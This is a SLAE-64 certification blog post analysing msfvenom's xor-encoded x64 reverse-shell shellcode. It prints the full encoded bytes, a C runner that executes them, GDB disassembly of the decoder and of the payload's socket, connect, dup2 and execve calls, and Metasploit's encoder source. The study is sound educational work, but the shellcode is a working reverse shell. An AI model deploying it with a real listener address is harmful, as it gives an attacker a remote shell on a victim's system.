Tags: assembly, slae-64, shellcode
This post and two others make up the fifth of seven assignments in my attempt at the SecurityTube Linux Assembly Expert (SLAE-64) certification. The seven assignments vary in difficulty. I decided to take SLAE-64 to shore up my knowledge of assembly and shellcoding before diving into OSCE.
This time around, I thought it would be interesting to use an encoder and see how msfvenom implemented it in assembly.
We’ll start this analysis out in the same way we’ve done for the previous two posts that can be found here and here.
/*
* msfvenom -p linux/x64/shell_reverse_tcp -e x64/xor -f c LHOST=127.0.0.1 LPORT=4444
*
* [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
* [-] No arch selected, selecting arch: x64 from the payload
* Found 1 compatible encoders
* Attempting to encode payload with 1 iterations of x64/xor
* x64/xor succeeded with size 119 (iteration=0)
* x64/xor chosen with final size 119
* Payload size: 119 bytes
* Final size of c file: 524 bytes
*/
unsigned char buf[] =
"\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48\x8d\x05\xef\xff"
"\xff\xff\x48\xbb\xcb\x58\xad\x94\xef\x3b\x06\x3c\x48\x31\x58"
"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xa1\x71\xf5\x0d\x85\x39"
"\x59\x56\xca\x06\xa2\x91\xa7\xac\x4e\x85\xc9\x58\xbc\xc8\x90"
"\x3b\x06\x3d\x9a\x10\x24\x72\x85\x2b\x5c\x56\xe1\x00\xa2\x91"
"\x85\x38\x58\x74\x34\x96\xc7\xb5\xb7\x34\x03\x49\x3d\x32\x96"
"\xcc\x76\x73\xbd\x13\xa9\x31\xc3\xbb\x9c\x53\x06\x6f\x83\xd1"
"\x4a\xc6\xb8\x73\x8f\xda\xc4\x5d\xad\x94\xef\x3b\x06\x3c";
We then add the shellcode generated above to the skeleton.
// gcc -fno-stack-protector -z execstack -o shellcode-skeleton shellcode-skeleton.c
#include <stdio.h>
#include <string.h>
unsigned char code[] = \
"\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48\x8d\x05\xef\xff"
"\xff\xff\x48\xbb\xcb\x58\xad\x94\xef\x3b\x06\x3c\x48\x31\x58"
"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xa1\x71\xf5\x0d\x85\x39"
"\x59\x56\xca\x06\xa2\x91\xa7\xac\x4e\x85\xc9\x58\xbc\xc8\x90"
"\x3b\x06\x3d\x9a\x10\x24\x72\x85\x2b\x5c\x56\xe1\x00\xa2\x91"
"\x85\x38\x58\x74\x34\x96\xc7\xb5\xb7\x34\x03\x49\x3d\x32\x96"
"\xcc\x76\x73\xbd\x13\xa9\x31\xc3\xbb\x9c\x53\x06\x6f\x83\xd1"
"\x4a\xc6\xb8\x73\x8f\xda\xc4\x5d\xad\x94\xef\x3b\x06\x3c";
int main() {
    // sizeof, not strlen: this encoded buffer contains a 0x00 byte, so strlen would stop early
    printf("Shellcode length: %zu\n", sizeof(code) - 1);
    int (*ret)() = (int(*)())code;
    ret();
}
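One thing worth checking before trusting a strlen-style length for this buffer is whether the encoded bytes contain a null. No bad characters were passed to msfvenom, so nothing forces the encoder to avoid them. The snippet below is a small sketch of that check; `CODE` and `first_null` are names I made up for illustration, and the bytes are copied from the msfvenom output above.

```python
# Bytes copied from the msfvenom output above (15 bytes per line, 14 on the last).
CODE = bytes.fromhex(
    "4831c94881e9f6ffffff488d05efff"
    "ffff48bbcb58ad94ef3b063c483158"
    "27482df8ffffffe2f4a171f50d8539"
    "5956ca06a291a7ac4e85c958bcc890"
    "3b063d9a102472852b5c56e100a291"
    "853858743496c7b5b73403493d3296"
    "cc7673bd13a931c3bb9c53066f83d1"
    "4ac6b8738fdac45dad94ef3b063c"
)

# A C strlen() stops at the first 0x00, so this index is what it would report.
first_null = CODE.find(b"\x00")

print("total bytes:", len(CODE))
print("offset of first null byte:", first_null)
```

If the second number is smaller than the first, a strlen-based length undercounts, which is why a sizeof-based length is the safer thing to print in the skeleton.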
Finally, we compile and run with GDB.
┌(epi@main)─(05:41 AM Thu Aug 05)
└─(assignment-five)─> gcc -o shellcode-skeleton shellcode-skeleton.c -fno-stack-protector -z execstack
┌(epi@main)─(05:41 AM Thu Aug 05)
└─(assignment-five)─> gdb ./shellcode-skeleton
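The listing below is the disassembly at the moment we hit the first instruction of our shellcode; the payload has not been decoded yet. The first seven instructions (offsets +0 through +37) make up the decoder stub. Everything after them, shown commented out, is the still-encoded payload being misread as instructions.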
0x0000555555755020 <+0>: xor rcx,rcx ; zero out rcx
0x0000555555755023 <+3>: sub rcx,0xfffffffffffffff6 ; subtract -10, i.e. add 10 to rcx (loop counter)
; load address of shellcode (0x555555755020) using rip relative addressing
0x000055555575502a <+10>: lea rax,[rip+0xffffffffffffffef]
0x0000555555755031 <+17>: movabs rbx,0x3c063bef94ad58cb ; store 8-byte key in rbx to perform xor function
0x000055555575503b <+27>: xor QWORD PTR [rax+0x27],rbx ; xor the 8 bytes at shellcode + 0x27 with key in rbx
0x000055555575503f <+31>: sub rax,0xfffffffffffffff8 ; advance rax pointer 8 bytes
; xor decoder loop (1st iteration shellcode + 0x27 + 0, 2nd shellcode + 0x27 + 8 ...)
0x0000555555755045 <+37>: loop 0x55555575503b <code+27>
; 0x0000555555755047 <+39>: movabs eax,ds:0xca565939850df571
; 0x0000555555755050 <+48>: (bad)
; 0x0000555555755051 <+49>: movabs ds:0xbc58c9854eaca791,al
; 0x000055555575505a <+58>: enter 0x3b90,0x6
; 0x000055555575505e <+62>: cmp eax,0x7224109a
; 0x0000555555755063 <+67>: test DWORD PTR [rbx],ebp
; 0x0000555555755065 <+69>: pop rsp
; 0x0000555555755066 <+70>: push rsi
; 0x0000555555755067 <+71>: loope 0x555555755069 <code+73>
; 0x0000555555755069 <+73>: movabs ds:0xc796347458388591,al
; 0x0000555555755072 <+82>: mov ch,0xb7
; 0x0000555555755074 <+84>: xor al,0x3
; 0x0000555555755076 <+86>: rex.WB cmp rax,0x76cc9632
; 0x000055555575507c <+92>: jae 0x55555575503b <code+27>
; 0x000055555575507e <+94>: adc ebp,DWORD PTR [rcx-0x63443ccf]
; 0x0000555555755084 <+100>: push rbx
; 0x0000555555755085 <+101>: (bad)
; 0x0000555555755086 <+102>: outs dx,DWORD PTR ds:[rsi]
; 0x0000555555755087 <+103>: adc ecx,0x4a
; 0x000055555575508a <+106>: (bad)
; 0x000055555575508b <+107>: mov eax,0xc4da8f73
; 0x0000555555755090 <+112>: pop rbp
; 0x0000555555755091 <+113>: lods eax,DWORD PTR ds:[rsi]
; 0x0000555555755092 <+114>: xchg esp,eax
; 0x0000555555755093 <+115>: out dx,eax
; 0x0000555555755094 <+116>: cmp eax,DWORD PTR [rsi]
; 0x0000555555755096 <+118>: cmp al,0x0
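The stub leans on two's-complement arithmetic in three places: the negative immediate that sets the loop counter, the negative rip-relative displacement that finds the start of the shellcode, and the one-byte backward displacement of the loop instruction (encoded as e2 f4). The sketch below just redoes that arithmetic so the numbers can be checked by hand. The helper `to_signed` and the variable names are mine; the addresses are the ones GDB printed in the listing. My guess is that the negative immediates are there to keep null bytes out of the stub, since a small positive 32-bit immediate would be mostly zeros.

```python
MASK64 = (1 << 64) - 1


def to_signed(value, bits=64):
    """Interpret an unsigned integer as a two's-complement signed value."""
    sign_bit = 1 << (bits - 1)
    return (value ^ sign_bit) - sign_bit


# sub rcx, 0xfffffffffffffff6 with rcx == 0 (64-bit wraparound)
rcx = (0 - 0xFFFFFFFFFFFFFFF6) & MASK64

# lea rax, [rip+0xffffffffffffffef]; rip holds the address of the NEXT instruction
rip_after_lea = 0x0000555555755031
rax = (rip_after_lea + 0xFFFFFFFFFFFFFFEF) & MASK64

# loop rel8: the displacement byte 0xf4 is relative to the instruction after loop
address_after_loop = 0x0000555555755047
loop_target = address_after_loop + to_signed(0xF4, bits=8)

print("immediate as signed:", to_signed(0xFFFFFFFFFFFFFFF6))
print("loop counter (rcx):", rcx)
print("shellcode base (rax):", hex(rax))
print("first encoded block:", hex(rax + 0x27))
print("loop target:", hex(loop_target))
```

The first encoded block lands at base + 0x27 because the stub itself is 0x27 (39) bytes long, so the xor starts on the first byte after the loop instruction.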
Now we’ll take a look at each iteration of the decoder loop to see how the decoder changes the payload beneath it. The snippets below show which instructions become readable after each xor operation, starting with the very first. Feel free to compare them with what the same offsets looked like before being decoded. Also, for the sake of brevity, we’ll analyze the instructions as we go.
; after 1st xor operation
0x0000555555755047 <+39>: push 0x29 ; push socket syscall # onto stack
0x0000555555755049 <+41>: pop rax ; and store it in rax
0x000055555575504a <+42>: cdq ; zero out rdx via sign extension
0x000055555575504b <+43>: push 0x2 ; push AF_INET onto the stack
0x000055555575504d <+45>: pop rdi ; and store it in rdi
; after 2nd xor operation
0x000055555575504e <+46>: push 0x1 ; push SOCK_STREAM onto the stack
0x0000555555755050 <+48>: pop rsi ; and store it in rsi
0x0000555555755051 <+49>: syscall ; socket syscall
0x0000555555755053 <+51>: xchg rdi,rax ; store file descriptor in rdi
; after 3rd xor operation
0x0000555555755055 <+53>: movabs rcx,0x100007f5c110002
; sockaddr_in struct
; sin_family -> AF_INET
; sin_port -> 4444
; sin_addr -> 127.0.0.1
; after 4th xor operation
0x000055555575505f <+63>: push rcx ; push sockaddr_in onto the stack
0x0000555555755060 <+64>: mov rsi,rsp ; store pointer in rsi
0x0000555555755063 <+67>: push 0x10 ; push 16 onto the stack (length of sockaddr_in)
0x0000555555755065 <+69>: pop rdx ; and store it in rdx
; after 5th xor operation
0x0000555555755066 <+70>: push 0x2a ; push connect syscall number onto the stack
0x0000555555755068 <+72>: pop rax ; and store it in rax
0x0000555555755069 <+73>: syscall ; connect syscall
0x000055555575506b <+75>: push 0x3 ; push 0x3 onto the stack
0x000055555575506d <+77>: pop rsi ; and store it in rsi
; after 6th xor operation
0x000055555575506e <+78>: dec rsi ; remove 1 from rsi
0x0000555555755071 <+81>: push 0x21 ; push dup2 syscall number onto the stack
0x0000555555755073 <+83>: pop rax ; and store it in rax
0x0000555555755074 <+84>: syscall ; dup2 syscall (rsi is 2 at this point, i.e. STDERR is dup'd)
; after 7th xor operation
; dup2 loop, STDIN and STDOUT left to be dup'd before moving on
0x0000555555755076 <+86>: jne 0x55555575506e <code+78>
0x0000555555755078 <+88>: push 0x3b ; push execve syscall onto the stack
0x000055555575507a <+90>: pop rax ; and store it in rax
0x000055555575507b <+91>: cdq ; zero out rdx via sign extension
; after 8th xor operation
0x000055555575507c <+92>: movabs rbx,0x68732f6e69622f ; store /bin/sh in rbx
0x0000555555755086 <+102>: push rbx ; push rbx onto the stack
; after 9th xor operation
0x0000555555755087 <+103>: mov rdi,rsp ; store pointer to /bin/sh in rdi
0x000055555575508a <+106>: push rdx ; push 0x0 onto the stack
0x000055555575508b <+107>: push rdi ; push pointer to /bin/sh onto the stack
0x000055555575508c <+108>: mov rsi,rsp ; and store it in rsi
; after 10th xor operation
0x000055555575508f <+111>: syscall ; execve syscall
0x0000555555755091 <+113>: add BYTE PTR [rax],al ; padding, the instruction's opcode is 0x00
0x0000555555755093 <+115>: add BYTE PTR [rax],al ; padding - 0x00
0x0000555555755095 <+117>: add BYTE PTR [rax],al ; padding - 0x00
0x0000555555755097 <+119>: add BYTE PTR [rax],al ; not shellcode: offset 119 is the C string's null terminator
; gdb-peda$ x/7xb 0x555555755091
; 0x555555755091 <code+113>: 0x00 0x00 0x00 0x00 0x00 0x00 0x00
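The same decoding can be reproduced offline, without running anything, by xoring the bytes after the stub with the key in 8-byte blocks. This is a minimal sketch of that idea and not the decoder itself; `ENCODED`, `KEY`, `STUB_LEN` and `xor_decode` are illustrative names, and the bytes are copied from the msfvenom output. Note the key is converted to little-endian bytes, because that is how the movabs immediate sits in memory.

```python
ENCODED = bytes.fromhex(
    "4831c94881e9f6ffffff488d05efff"
    "ffff48bbcb58ad94ef3b063c483158"
    "27482df8ffffffe2f4a171f50d8539"
    "5956ca06a291a7ac4e85c958bcc890"
    "3b063d9a102472852b5c56e100a291"
    "853858743496c7b5b73403493d3296"
    "cc7673bd13a931c3bb9c53066f83d1"
    "4ac6b8738fdac45dad94ef3b063c"
)

KEY = (0x3C063BEF94AD58CB).to_bytes(8, "little")  # cb 58 ad 94 ef 3b 06 3c
STUB_LEN = 0x27  # the xor starts at [rax+0x27]


def xor_decode(blob, key, offset):
    """XOR everything after the stub with the repeating key."""
    body = blob[offset:]
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(body))


decoded = xor_decode(ENCODED, KEY, STUB_LEN)

# One line per decoder-loop iteration (bytes.hex(sep) needs Python 3.8+).
for start in range(0, len(decoded), len(KEY)):
    block = decoded[start:start + len(KEY)]
    print(f"xor #{start // len(KEY) + 1:2}: {block.hex(' ')}")
```

Each printed row corresponds to one "after Nth xor operation" snippet above. The rows do not line up with instruction boundaries, which is why some instructions only become readable once two consecutive blocks are decoded.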
Below is the complete decoded shellcode and stub together.
0x0000555555755020 <+0>: xor rcx,rcx ; zero out rcx
0x0000555555755023 <+3>: sub rcx,0xfffffffffffffff6 ; add 10 to rcx
0x000055555575502a <+10>: lea rax,[rip+0xffffffffffffffef] ; load address of shellcode
0x0000555555755031 <+17>: movabs rbx,0x3c063bef94ad58cb ; store 8-byte key in rbx to perform xor function
0x000055555575503b <+27>: xor QWORD PTR [rax+0x27],rbx ; xor the 8 bytes at shellcode + 0x27 with key in rbx
0x000055555575503f <+31>: sub rax,0xfffffffffffffff8 ; advance rax pointer 8 bytes
0x0000555555755045 <+37>: loop 0x55555575503b <code+27> ; xor decoder loop
0x0000555555755047 <+39>: push 0x29 ; push socket syscall # onto stack
0x0000555555755049 <+41>: pop rax ; and store it in rax
0x000055555575504a <+42>: cdq ; zero out rdx via sign extension
0x000055555575504b <+43>: push 0x2 ; push AF_INET onto the stack
0x000055555575504d <+45>: pop rdi ; and store it in rdi
0x000055555575504e <+46>: push 0x1 ; push SOCK_STREAM onto the stack
0x0000555555755050 <+48>: pop rsi ; and store it in rsi
0x0000555555755051 <+49>: syscall ; socket syscall
0x0000555555755053 <+51>: xchg rdi,rax ; store file descriptor in rdi
0x0000555555755055 <+53>: movabs rcx,0x100007f5c110002 ; sockaddr_in struct
0x000055555575505f <+63>: push rcx ; push sockaddr_in onto the stack
0x0000555555755060 <+64>: mov rsi,rsp ; store pointer in rsi
0x0000555555755063 <+67>: push 0x10 ; push 16 onto the stack (length of sockaddr_in)
0x0000555555755065 <+69>: pop rdx ; and store it in rdx
0x0000555555755066 <+70>: push 0x2a ; push connect syscall number onto the stack
0x0000555555755068 <+72>: pop rax ; and store it in rax
0x0000555555755069 <+73>: syscall ; connect syscall
0x000055555575506b <+75>: push 0x3 ; push 0x3 onto the stack
0x000055555575506d <+77>: pop rsi ; and store it in rsi
0x000055555575506e <+78>: dec rsi ; remove 1 from rsi
0x0000555555755071 <+81>: push 0x21 ; push dup2 syscall number onto the stack
0x0000555555755073 <+83>: pop rax ; and store it in rax
0x0000555555755074 <+84>: syscall ; dup2 syscall
0x0000555555755076 <+86>: jne 0x55555575506e <code+78> ; dup2 loop
0x0000555555755078 <+88>: push 0x3b ; push execve syscall onto the stack
0x000055555575507a <+90>: pop rax ; and store it in rax
0x000055555575507b <+91>: cdq ; zero out rdx via sign extension
0x000055555575507c <+92>: movabs rbx,0x68732f6e69622f ; store /bin/sh in rbx
0x0000555555755086 <+102>: push rbx ; push rbx onto the stack
0x0000555555755087 <+103>: mov rdi,rsp ; store pointer to /bin/sh in rdi
0x000055555575508a <+106>: push rdx ; push 0x0 onto the stack
0x000055555575508b <+107>: push rdi ; push pointer to /bin/sh onto the stack
0x000055555575508c <+108>: mov rsi,rsp ; and store it in rsi
0x000055555575508f <+111>: syscall ; execve syscall
0x0000555555755091 <+113>: add BYTE PTR [rax],al ; padding, the instruction's opcode is 0x00
0x0000555555755093 <+115>: add BYTE PTR [rax],al ; padding - 0x00
0x0000555555755095 <+117>: add BYTE PTR [rax],al ; padding - 0x00
0x0000555555755097 <+119>: add BYTE PTR [rax],al ; not shellcode: offset 119 is the C string's null terminator
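To double check the comments on the two movabs immediates and on the dup2 loop, here is a small sketch that unpacks the constants the way the kernel would see them in memory. The function names are hypothetical. The loop model assumes the flags set by dec rsi are still intact when jne runs after the syscall, which is what the listing relies on.

```python
import socket
import struct

# Immediates copied from the two movabs instructions in the listing.
SOCKADDR_IMM = 0x0100007F5C110002
BINSH_IMM = 0x0068732F6E69622F


def parse_sockaddr_in(imm):
    """Split the 8-byte immediate into sin_family, sin_port and sin_addr."""
    raw = imm.to_bytes(8, "little")          # byte order as pushed on the stack
    (family,) = struct.unpack("<H", raw[0:2])  # host (little-endian) order
    (port,) = struct.unpack(">H", raw[2:4])    # network (big-endian) order
    address = socket.inet_ntoa(raw[4:8])
    return family, port, address


def dup2_targets(start=3):
    """Model the dec rsi / dup2 / jne loop: returns the fds duplicated, in order."""
    rsi = start
    targets = []
    while True:
        rsi -= 1             # dec rsi sets ZF when rsi reaches 0
        targets.append(rsi)  # dup2(sockfd, rsi)
        if rsi == 0:         # jne falls through once ZF is set
            break
    return targets


family, port, address = parse_sockaddr_in(SOCKADDR_IMM)
path = BINSH_IMM.to_bytes(8, "little")

print("sin_family:", family)
print("sin_port:", port)
print("sin_addr:", address)
print("execve path:", path)
print("dup2 order:", dup2_targets())
```

The port is the only field read big-endian, which is why 4444 (0x115c) shows up as 5c11 inside the immediate.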
After stepping through the assembly in GDB, I wanted to confirm my work by looking at the source code for the encoder. It’s written in Ruby, but even if you don’t have any Ruby experience (I have next to none), it’s pretty easy to understand.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Encoder::Xor
  def initialize
    super(
      'Name' => 'XOR Encoder',
      'Description' => 'An x64 XOR encoder. Uses an 8 byte key and takes advantage of x64 relative addressing.',
      'Author' => [ 'sf' ],
      'Arch' => ARCH_X64,
      'License' => MSF_LICENSE,
      'Decoder' =>
        {
          'KeySize' => 8,
          'KeyPack' => 'Q',
          'BlockSize' => 8,
        }
    )
  end
  # Indicate that this module can preserve some registers
  # ...which is currently not true. This is a temp fix
  # until the full preserve_registers functionality is
  # implemented.
  def can_preserve_registers?
    true
  end
  def decoder_stub( state )
    # calculate the (negative) block count . We should check this against state.badchars.
    block_count = [-( ( (state.buf.length - 1) / state.decoder_key_size) + 1)].pack( "V" )
    decoder = "\x48\x31\xC9" + # xor rcx, rcx
      "\x48\x81\xE9" + block_count + # sub ecx, block_count
      "\x48\x8D\x05\xEF\xFF\xFF\xFF" + # lea rax, [rel 0x0]
      "\x48\xBBXXXXXXXX" + # mov rbx, 0x????????????????
      "\x48\x31\x58\x27" + # xor [rax+0x27], rbx
      "\x48\x2D\xF8\xFF\xFF\xFF" + # sub rax, -8
      "\xE2\xF4" # loop 0x1B
    state.decoder_key_offset = decoder.index( 'XXXXXXXX' )
    return decoder
  end
end
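To convince myself the Ruby matches what GDB showed, I find it helpful to rebuild the stub in a few lines of Python and compare it with the first 39 bytes of the msfvenom output. This is only a sketch of the `decoder_stub` logic with the key filled in directly. The Python function takes a payload length and key as plain arguments (my simplification, not the Metasploit API), and I use a signed 32-bit little-endian pack to get the same bytes Ruby's `pack("V")` produces for the negative count.

```python
import struct


def decoder_stub(payload_len, key, key_size=8):
    """Rebuild the x64/xor stub bytes for a payload of the given length."""
    # Negative number of 8-byte blocks, rounding the payload length up.
    block_count = -(((payload_len - 1) // key_size) + 1)
    return (
        b"\x48\x31\xc9"                                      # xor rcx, rcx
        + b"\x48\x81\xe9" + struct.pack("<i", block_count)   # sub rcx, block_count
        + b"\x48\x8d\x05\xef\xff\xff\xff"                    # lea rax, [rip-0x11]
        + b"\x48\xbb" + key                                  # movabs rbx, key
        + b"\x48\x31\x58\x27"                                # xor [rax+0x27], rbx
        + b"\x48\x2d\xf8\xff\xff\xff"                        # sub rax, -8
        + b"\xe2\xf4"                                        # loop back to the xor
    )


KEY = bytes.fromhex("cb58ad94ef3b063c")

# First 39 bytes of the msfvenom output from the top of the post.
OBSERVED_STUB = bytes.fromhex(
    "4831c94881e9f6ffffff488d05efff"
    "ffff48bbcb58ad94ef3b063c483158"
    "27482df8ffffffe2f4"
)

# The decoded payload above is 80 bytes including padding; any length
# from 73 to 80 rounds up to the same 10 blocks.
stub = decoder_stub(80, KEY)

print("stub length:", len(stub))
print("matches msfvenom output:", stub == OBSERVED_STUB)
```

The stub length is also where the hard-coded 0x27 in the xor instruction comes from: the encoded payload starts immediately after the stub's last byte.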